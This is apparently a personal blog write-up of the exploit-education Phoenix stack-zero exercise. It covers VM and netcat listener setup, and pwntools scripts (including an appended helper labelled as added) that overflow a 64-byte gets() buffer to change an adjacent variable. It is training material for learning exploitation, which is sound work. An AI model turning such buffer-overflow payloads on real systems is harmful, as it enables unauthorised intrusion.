BuringStraw

[pwn Notes 0] Phoenix Environment Setup and stack-zero

I found a project for learning pwn at http://exploit.education and decided to spend some time on pwn to get on the right track. I'll try to start a series of notes (I always forget how to write pwntools scripts) and hope not to give up halfway. A small goal: at least finish the Phoenix series.

Environment Setup#

First, download the Phoenix virtual machine image from the more-downloads section, choosing the one for your architecture. This is the target machine. Before starting, install qemu-system-x86 (on Arch Linux the 64-bit emulator is in the same package).

Run boot-balabala.sh to start the virtual machine; by default it forwards ssh to port 2222 on the host. The username and password are both user.

If you want to expose a program inside the VM over netcat, add another port forwarding to the startup script. Here is an example of the whole network line:

-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333

Then, execute the following command inside the virtual machine.

mkfifo io

And create a script file (start.sh)

#!/bin/bash
# $1 is the path of the program to serve. Its stdin is fed from the fifo,
# its stdout and stderr go to the connected client, and everything the
# client sends is written back into the fifo.
cat io | "$1" 2>&1 | nc -l 3333 > io

Then you can start the listener with sh start.sh /opt/phoenix/amd64/stack-zero; remember that the port 3333 here must match the one in the startup script. Note that nc -l without -k exits after the first connection closes, so the script has to be started again for every attempt.

The gdb in the virtual machine comes with gef installed, but I don't know it very well, so I copied peda into the VM instead. Skipping the details.

Install pwntools, which is very convenient, on the host machine: pip install pwntools

stack-zero#

The program is relatively simple, so I just opened it in Cutter.

![Screenshot_Select_Area_20230215183930.png](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Screenshot_Select_Area_20230215183930.png)

(Actually, the source code is provided on the exploit.education website. The comment at the top is even a joke.)

Now we want to overflow s into var_10h (changeme); the content written there can be anything, since the program only checks that changeme is non-zero. Open gdb, work out the distance, and first feed it some arbitrary input.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled.png)

The string (the buffer s) starts at 0x620.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%201.png)

The conditional statement reads changeme from rbp-0x10, that is 0x670-0x10 = 0x660.

So the buffer lies 0x660-0x620 = 0x40 = 64 bytes below changeme, which matches the 64-byte buffer in the source. The input is read with gets(), which has no length limit.

So we only need to send 0x41 'a's: the first 0x40 bytes fill the buffer and the 65th byte lands in the lowest byte of changeme, making it non-zero.

To practice using pwntools, write some code.

Here I connected directly using ssh, no need for nc.

from pwn import *

# Log into the Phoenix VM over the forwarded ssh port (user:user).
shell = ssh("user", "localhost", password="user", port=2222)
# Start the target inside the VM; sh is a tube like process()/remote().
sh = shell.run("/opt/phoenix/amd64/stack-zero")
print(sh.recvline())          # banner line
sh.sendline(b"a" * 0x41)      # 64 bytes of buffer + 1 byte into changeme
print(sh.recvline())          # "Well done, ..." on success
shell.close()
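The following is an added example, not code from the original post or from exploit.education. It turns the script above into something reusable for both transports described in this post (the ssh tube and the netcat listener from start.sh): the overflow length is derived from the rbp-relative operands seen in the disassembler rather than hard-coded, and the interaction is written against any object with recvline()/sendline(), so it can also be checked offline against a constructed fake target. Assumptions: the buffer operand is [rbp-0x50] (consistent with the 0x620/0x670 addresses in the screenshots), the success message begins with "Well done" as in the Phoenix source, and the hosts/ports are the ones used in this post.

```python
#!/usr/bin/env python3
"""stack-zero helper: offset from disassembly, payload, and a transport-
agnostic exploit routine. Added example; pwntools is only imported when an
actual target is contacted, so the rest runs without it."""
import re

# Operands as shown by the disassembler. [rbp-0x50] for the buffer is an
# assumption consistent with the post's 0x620/0x670 figures.
BUFFER_OPERAND = "[rbp-0x50]"
CHANGEME_OPERAND = "[rbp-0x10]"


def rbp_offset(operand):
    """'[rbp-0x50]' -> 0x50, the distance of the local below rbp."""
    m = re.fullmatch(r"\[rbp-0x([0-9a-fA-F]+)\]", operand.strip())
    if not m:
        raise ValueError("not an rbp-relative operand: %r" % operand)
    return int(m.group(1), 16)


def overflow_length(buffer_operand, changeme_operand):
    """Bytes needed to fill the buffer and write one byte into changeme."""
    distance = rbp_offset(buffer_operand) - rbp_offset(changeme_operand)
    if distance <= 0:
        raise ValueError("changeme is not above the buffer on the stack")
    return distance + 1


def build_payload(length, fill=b"a"):
    """Repeat fill to the requested length. gets() stops at '\\n', so the
    fill must not contain a newline; NUL bytes would be copied but are
    useless for making changeme non-zero."""
    if b"\n" in fill or b"\x00" in fill:
        raise ValueError("fill must not contain newline or NUL")
    return (fill * (length // len(fill) + 1))[:length]


def exploit(conn, payload):
    """Drive any tube-like object (pwntools ssh/remote tubes or the fake
    below). Returns True if the target reports changeme was changed."""
    conn.recvline()                 # banner
    conn.sendline(payload)
    verdict = conn.recvline()
    return verdict.startswith(b"Well done")   # assumed success message


def exploit_over_ssh(payload, host="localhost", port=2222):
    """Transport 1: run the binary through the forwarded ssh port."""
    from pwn import ssh
    shell = ssh("user", host, password="user", port=port)
    try:
        return exploit(shell.run("/opt/phoenix/amd64/stack-zero"), payload)
    finally:
        shell.close()


def exploit_over_nc(payload, host="127.0.0.1", port=3333):
    """Transport 2: connect to the start.sh netcat listener."""
    from pwn import remote
    conn = remote(host, port)
    try:
        return exploit(conn, payload)
    finally:
        conn.close()


class FakeStackZero:
    """Constructed stand-in for the target for offline checks: a 64-byte
    buffer followed by changeme, read with an unbounded gets()."""
    BUFFER_SIZE = 64

    def __init__(self):
        self._out = [b"Welcome to phoenix/stack-zero (fake)\n"]

    def recvline(self):
        return self._out.pop(0)

    def sendline(self, data):
        line = bytes(data).split(b"\n", 1)[0]      # gets() stops at newline
        overflowed = len(line) > self.BUFFER_SIZE
        self._out.append(b"Well done, the 'changeme' variable has been changed!\n"
                         if overflowed else
                         b"Uh oh, 'changeme' has not yet been changed.\n")


if __name__ == "__main__":
    payload = build_payload(overflow_length(BUFFER_OPERAND, CHANGEME_OPERAND))
    print("payload length:", len(payload))
    print("fake target:", exploit(FakeStackZero(), payload))
    # Uncomment one of these to hit the real VM:
    # print("ssh:", exploit_over_ssh(payload))
    # print("nc:", exploit_over_nc(payload))
```

The offset comes out as 0x41 for the operands in this post, matching the manual calculation. Keeping exploit() independent of the transport means the same routine is used whether the target is reached through the ssh tube or through the fifo-backed netcat listener.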

Success

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%202.png)
